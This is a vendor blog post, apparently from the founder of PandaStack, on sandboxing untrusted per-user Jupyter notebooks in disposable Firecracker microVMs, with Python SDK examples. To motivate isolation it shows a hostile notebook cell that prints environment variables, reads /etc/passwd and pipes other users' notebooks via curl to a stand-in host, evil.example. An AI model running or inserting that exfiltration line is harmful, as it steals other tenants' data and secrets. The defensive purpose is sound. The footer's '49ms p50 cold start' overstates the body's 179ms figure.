all posts

How to Sandbox Untrusted Jupyter Notebooks Per User

Ajay Kumar··9 min read

If you run a data platform or an education product where students, customers, or random signups write and execute their own Jupyter notebooks, you are operating a remote code execution service. That is not a slur — it is the literal description of the product. Every cell a user runs is arbitrary Python you did not write and cannot review. The only real question is what happens when one of those cells is hostile, broken, or just greedy. The answer depends almost entirely on one decision: how isolated each user's kernel is from everyone else's.

I'm Ajay — I built PandaStack, a Firecracker microVM platform. This post is about the multi-tenant notebook case specifically: why the obvious architecture (one big box, many kernels) quietly hands every user the keys to every other user's data, and why one disposable microVM per notebook session is the model that actually holds up. I'll show the per-session pattern with the Python SDK, and I'll be honest about where the boundaries are.

The shared-kernel trap

The default JupyterHub-style deployment runs many users' kernels as processes on a shared host (or in shared containers). It's easy, it's cheap, and it's a security model held together by hope. A Jupyter kernel is a full Python interpreter with a shell one import away. Nothing about "it's a notebook" constrains what the code can do.

Consider the friendliest-looking cell in the world from one of your users:

import os
# "just checking the environment"
print(os.environ)
# read whatever the host process can read
print(open("/etc/passwd").read())
# and now the part that ruins your week
os.system("cat /home/*/notebooks/* 2>/dev/null | curl -X POST --data-binary @- https://evil.example")

On a shared kernel or a shared container, every line of that has a real chance of working. The environment leaks your database URLs and API keys. The filesystem read walks into other tenants' notebooks because they're all on the same disk. The `os.system` exfiltrates the lot. And that's the polite attacker — the impolite one runs `while True: pass` across 64 threads, or allocates memory until the OOM killer starts shooting neighbors at random, or fork-bombs the box. None of these are exotic exploits. They're the first things anyone tries, and on a shared kernel they all land.

A Linux container is not a security boundary for untrusted code. Namespaces and cgroups share the host kernel — one kernel vulnerability or container escape, and a malicious notebook reaches the host and every neighbor on it. "We put each user in their own container" is better than nothing and worse than you think.

People reach for patches: drop the kernel's privileges, seccomp-filter the syscalls, set cgroup memory limits, run gVisor. These help, and you should do the network and resource ones regardless. But they're all hardening on top of a shared kernel, and the failure mode is the same: the day a kernel CVE drops or your seccomp policy has a gap, the blast radius is every tenant on the machine. You're betting all your users' data on the host kernel never having a bug. The host kernel always eventually has a bug.

The model that holds: one microVM per notebook session

The architecture that survives contact with real users is one hardware-isolated VM per notebook session. When a user opens their notebook, you create a sandbox. Their kernel runs inside it. When they log out (or go idle, or get reaped), you destroy it. The next session — even for the same user — gets a fresh one.

Each PandaStack sandbox is its own Firecracker microVM with its own guest kernel, the same VMM AWS Lambda and Fargate use to run untrusted multi-tenant code. The notebook's `os.system`, its `rm -rf /`, its 40GB allocation, its fork bomb — all contained to one throwaway VM with its own memory, its own filesystem, and its own network namespace. There is no shared kernel to attack and no neighbor's disk to read, because the neighbor is a different VM on different (copy-on-write) memory. An escape would have to break the hypervisor itself, a vastly smaller and more audited surface than the full Linux syscall table a container sees.

The historical objection to per-session VMs was startup cost: nobody wants their notebook to take eight seconds to wake up because you're cold-booting a virtual machine. That objection is the part PandaStack is built to kill. Every create restores a baked snapshot on demand instead of cold-booting, so a sandbox comes up in p50 179ms (about 49ms for the snapshot-restore step itself), p99 ~203ms. The first ever spawn of a template is a ~3s cold boot that captures the snapshot; every spawn after that takes the fast path. VM-grade isolation, container-ish latency.

The rule of thumb: the VM is the trust boundary. One session, one VM. Never let two different users' code share a sandbox, and don't recycle a sandbox from user A to user B without destroying it first. Isolation is only as good as how strictly you honor "per session."

The per-session pattern in code

Here's the shape of it with the Python SDK. On login (or on first cell execution) you create a sandbox for that session on the code-interpreter template — which bakes in pandas, numpy, matplotlib, scikit-learn, and a Jupyter/IPython kernel, so there's no per-session pip install. You write the user's cell to a file in the guest, exec it with a timeout, capture output, and read any artifacts (a plot, a CSV) back through the filesystem API. The `ttl_seconds` is a backstop so a session you forget to close reaps itself.

from pandastack import Sandbox

# On login: one sandbox per notebook session. The TTL is a backstop in case
# the user closes the tab without a clean logout (they always do).
session_sbx = Sandbox.create(
    template="code-interpreter",
    ttl_seconds=3600,           # auto-reap after an hour of life
    metadata={"user_id": "u_42", "notebook": "intro-to-pandas"},
)

def run_cell(sbx, cell_source: str, n: int) -> dict:
    """Execute one notebook cell inside the user's own microVM."""
    path = f"/workspace/cell_{n}.py"
    sbx.filesystem.write(path, cell_source)
    # ALWAYS pass a timeout. User code loops more than you'd believe.
    result = sbx.exec(f"python3 {path}", timeout_seconds=30)
    return {
        "exit_code": result.exit_code,
        "stdout": result.stdout,
        "stderr": result.stderr,
    }

# A cell that makes a chart and saves it to /workspace.
cell = '''
import matplotlib
matplotlib.use("Agg")            # headless, no display in the VM
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(0, 10, 200)
plt.plot(x, np.sin(x))
plt.title("hello from an isolated kernel")
plt.savefig("/workspace/plot.png", dpi=120, bbox_inches="tight")
print("chart written")
'''

out = run_cell(session_sbx, cell, n=1)
print("exit:", out["exit_code"], "|", out["stdout"].strip())

Reading the chart back out is the same pattern any notebook UI needs — the cell writes a known path, you check the exit code, then pull the bytes. Render them inline, or attach them to the notebook output.

# Read the generated artifact back as raw bytes and hand it to your UI.
if out["exit_code"] == 0:
    png_bytes = session_sbx.filesystem.read("/workspace/plot.png")
    with open("plot.png", "wb") as f:
        f.write(png_bytes)
    print(f"pulled {len(png_bytes)} bytes of plot")

# On logout (or idle reap, or the user rage-quitting): destroy the VM.
# This is the whole point — the blast radius leaves with the session.
session_sbx.kill()

Within a single session, state persists naturally: the kernel and the guest filesystem are alive for the life of the sandbox, so a dataframe a user saves in cell one is right there in cell two. For true in-memory continuity (live Python objects across cells, exact notebook semantics) keep a persistent Jupyter kernel running inside the sandbox and send each cell to it — the kernel binaries are already baked into the template. What you never do is share that kernel across users.

Shared JupyterHub kernel vs microVM-per-session

  • Isolation boundary — Shared kernel: namespaces + cgroups on one host kernel; an escape or kernel CVE reaches every tenant. microVM-per-session: hardware-virtualized VM with its own guest kernel; an escape has to break the hypervisor.
  • Cross-tenant data — Shared kernel: notebooks and env vars often sit on the same host, one path traversal away. microVM-per-session: each session is a separate VM on copy-on-write memory and its own filesystem — nothing to traverse into.
  • Runaway code (infinite loops, fork bombs, OOM) — Shared kernel: a noisy neighbor degrades or kills everyone on the box. microVM-per-session: capped to one VM's vCPU/RAM; the rest of the fleet never notices.
  • Blast radius of a malicious cell — Shared kernel: potentially the host and all tenants. microVM-per-session: one disposable VM that you destroy on logout anyway.
  • Startup cost — Shared kernel: a kernel spawns in well under a second. microVM-per-session: snapshot-restore create at p50 179ms (~203ms p99), ~3s only on the very first cold boot of a template.
  • Cleanup — Shared kernel: you have to scrub state, temp files, and stray processes between users and pray you got it all. microVM-per-session: kill the VM; state cannot leak because the VM is gone.
  • Operational model — Shared kernel: harden the host forever and own every CVE. microVM-per-session: per-session VMs are cattle; treat the host as untrusted and let the hypervisor do the isolating.

Operational notes from running this for real

A few things worth doing once you commit to per-session VMs:

  • Always set both timeout_seconds on exec and ttl_seconds on create. The exec timeout catches the loop; the TTL catches the session that never logs out. Tabs get closed without warning constantly.
  • Lock down network egress at the network layer, not in the code. The VM contains execution, but if a notebook can reach the internet it can still exfiltrate whatever it computes — restrict outbound access for untrusted tenants.
  • Never inject your platform's secrets into the guest. A sandbox isolates the user's code from your host; it does not protect a database URL you handed straight to that code. Keep credentials out of the VM's environment entirely.
  • Snapshot a configured "golden" notebook environment once and fork it per session if you want every user to start from an identical pre-warmed state — a same-host fork is 400–750ms and shares memory copy-on-write (cross-host is 1.2–3.5s).
  • If users need a real database, give each their own — a managed Postgres VM takes 30–90s to provision and is its own isolated microVM, not a schema on a shared instance.

Capacity is rarely the constraint people fear: a single agent pre-allocates 16,384 /30 subnets, so the practical ceiling on concurrent sessions is host memory and CPU, not networking. You scale tenants horizontally by adding hosts, and because idle sessions can hibernate (snapshot memory + disk, stop the VM, auto-wake on the next request) a classroom of 200 students who all wandered off to lunch isn't 200 VMs burning RAM.

When a shared kernel is actually fine

To be fair to the simple architecture: if every user of your notebook platform is a trusted employee on the same team, sharing a host is reasonable and a per-session VM is overkill. The trust boundary is the company, not the individual, and you've accepted that risk implicitly anyway. The model breaks the instant "users" means "people who signed up" — students, customers, prospects, the public. The moment you can't vouch for the person writing the code, the kernel they run on has to be theirs alone. That's the entire decision, and per-session microVMs are how you make "theirs alone" cheap enough to actually do.

Frequently asked questions

Why isn't a per-user container enough to sandbox untrusted notebooks?

Containers share the host kernel. A malicious notebook only needs one kernel vulnerability or container-escape bug to reach the host and every other tenant on it, and a busy loop or large allocation can starve neighbors through the shared kernel's scheduler and memory. Hardening (seccomp, dropped privileges, cgroup limits) reduces but never removes that shared-kernel risk. A Firecracker microVM gives each session its own guest kernel, so an escape would have to break the hypervisor itself.

How do I isolate each user's Jupyter kernel?

Create one sandbox per notebook session on the code-interpreter template, run that user's kernel inside it, and destroy the sandbox on logout or idle reap. Each sandbox is its own Firecracker microVM with a separate guest kernel, filesystem, and network namespace, so one user's code cannot read another's notebooks, env vars, or memory. Never share a sandbox across two different users — the VM is the trust boundary.

Won't booting a VM per notebook session be too slow?

Cold-booting a VM would be, which is why PandaStack restores a baked snapshot on every create instead. A sandbox comes up at p50 179ms (around 49ms for the snapshot-restore step, p99 ~203ms). Only the very first spawn of a template is a ~3s cold boot that captures the snapshot; every session after that takes the fast path. To start every session from an identical pre-warmed state you can fork a snapshot in 400–750ms on the same host.

How do I stop one notebook from taking down the whole platform?

Run each session in its own microVM with its own vCPU and RAM, so an infinite loop, fork bomb, or memory blowout is capped to that one VM and the rest of the fleet is unaffected. Always set a timeout on each cell execution and a TTL on the sandbox so runaway code and abandoned sessions reap themselves, and restrict network egress at the network layer to limit data exfiltration.

How does state persist between cells if each session is a throwaway VM?

The VM is throwaway per session, not per cell — it stays alive for the whole notebook session. State persists naturally on the guest filesystem and in a long-running kernel for the life of that sandbox, so a dataframe saved in one cell is available in the next. For exact notebook semantics (live Python objects across cells) keep a persistent Jupyter kernel running inside the sandbox; the kernel binaries are baked into the template. The state only disappears when the session ends and you kill the VM.

Run code in a microVM in one API call.

49ms p50 cold start. Fork, snapshot, and scale to zero.

Start free
Written by Ajay Kumar, Founder, PandaStack.